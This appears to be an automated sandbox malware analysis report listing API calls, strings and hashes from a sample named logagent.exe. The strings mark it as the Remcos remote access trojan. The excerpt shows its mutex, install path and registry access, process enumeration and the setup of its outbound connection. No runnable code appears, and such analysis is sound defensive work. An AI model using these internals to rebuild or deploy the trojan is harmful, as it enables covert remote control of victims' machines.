                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                    • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                    • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                    • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                  • wcslen.MSVCRT ref: 004090DB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                    • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                    • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                    • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                    • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                  • wcscpy.MSVCRT ref: 00409230
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                  • atoi.MSVCRT ref: 00409391
                                  • CreateThread.KERNEL32 ref: 004093C0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                  • atoi.MSVCRT ref: 00409540
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                    • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                    • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409A81
                                    • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00409ACC
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                    • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                    • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                  • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                  • API String ID: 1672879135-1489423779
                                  • Opcode ID: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                  • Opcode Fuzzy Hash: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  [Control-flow graph of the function starting at 40c81c (basic blocks 40c81c through 40d26b, graph nodes 250-369) is rendered as an image in the original report; its text dump of node ids, block ranges and called API names is not reproduced here.]
                                  APIs
                                    • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,761B43E0,0041BCB0,00000000), ref: 00412492
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,761B43E0,0041BCB0,00000000), ref: 0040C83F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                  • atoi.MSVCRT ref: 0040C85C
                                  • Sleep.KERNEL32(00000000), ref: 0040C870
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                  • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                  • atoi.MSVCRT ref: 0040C9DE
                                  • htons.WS2_32(00000000), ref: 0040C9E6
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                  • sprintf.MSVCRT ref: 0040CB14
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                  • _itoa.MSVCRT ref: 0040CB37
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
